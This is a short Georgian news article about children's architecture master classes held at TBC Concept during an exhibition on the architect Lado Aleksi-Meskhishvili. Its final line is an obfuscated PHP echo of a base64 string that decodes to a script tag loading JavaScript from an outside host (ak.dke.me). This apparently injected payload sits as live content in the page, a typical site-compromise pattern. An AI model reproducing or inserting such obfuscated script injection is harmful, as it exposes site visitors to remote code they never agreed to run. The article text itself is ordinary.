celsiusi
ავერსი საქკაბელი
„თიბისი კონცეპტის“ მულტიფუნქციურ სივრცეში, გამოფენის „ლადო ალექსი-მესხიშვილი - არქიტექტორი ეპოქების მიჯნაზე“ ფარგლებში, საბავშვო მასტერკლასები გაიმართა.
„თიბისის“ ცნობით, მასტერკლასზე ბავშვებმა გამოფენის დათვალიერების შემდეგ, არქიტექტორის მიერ დაპროექტებული შენობების სამგანზომილებიან მაკეტები თავად ააწყვეს.
„მასტერკლასებს VA[A]DS-ის არქიტექტურის პროგრამის სტუდენტები, ნიკა ცაგარეიშვილი და ვაჟა ჯაფარიძე ხელმძღვანელობდნენ, რომლებმაც გამოფენაზე წარმოდგენილი მაკეტების შექმნაზე იმუშავეს.
ლადო ალექსი-მესხიშვილი გასული საუკუნის ერთ-ერთი გამორჩეული არქიტექტორია, რომლის შემოქმედებამაც საქართველოში, განსაკუთრებით კი თბილისში, მნიშვნელოვანი კვალი დატოვა. „თიბისი კონცეპტში“ წარმოდგენილ გამოფენაზე დამთვალიერებელს პირველად ეძლევა შესაძლებლობა, ლადო ალექსი-მესხიშვილი ნამუშევრების ფართო საარქივო კოლექციას გაეცნოს და კიდევ ერთხელ გაიაზროს არქიტექტურაში სოციალური რეალიზმის ერთ-ერთი მთავარი ფუძემდებლის მიერ განვლილი შემოქმედებითი გზა.
ექსპოზიციაზე წარმოდგენილი ჩანახატების, ნახაზების, ფოტოებს, საარქივო მასალისა და მაკეტების პარალელურად, დამთვალიერებელი რეჟისორ ლანა ღოღობერიძის ფილმს იხილავს. რომელიც, როგორც თავად რეჟისორი ამბობს, ლადო ალექსი-მესხიშვილს კიდევ უფრო ახლოდან და განსხვავებული რაკურსით გვაცნობს. პროექტის პარტნიორები არიან საქართველოს ეროვნული არქივი და საქართველოს პარლამენტის ეროვნული ბიბლიოთეკა. სულ მალე გამოფენა „ლადო ალექსი-მესხიშვილი, არქიტექტორი ეპოქების მიჯნაზე” ქუთაისში გადაინაცვლებს. დამთვალიერებელს მისი ნახვა ი. გრიშაშვილის #26 მდებარე, „თიბისის“ ფილიალის საგამოფენო სივრცეში შეეძლება. გამოფენის მხარდამჭერი, ისევე როგორც, ჩვენი უახლესი ისტორიის კულტურული მემკვიდრეობის მნიშვნელოვანი პროექტების პოპულარიზაციის და ხელახლა გააზრების ინიციატორი, „თიბისია“, - აღნიშნულია გავრცელებულ ინფორმაციაში.
(R)
486
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");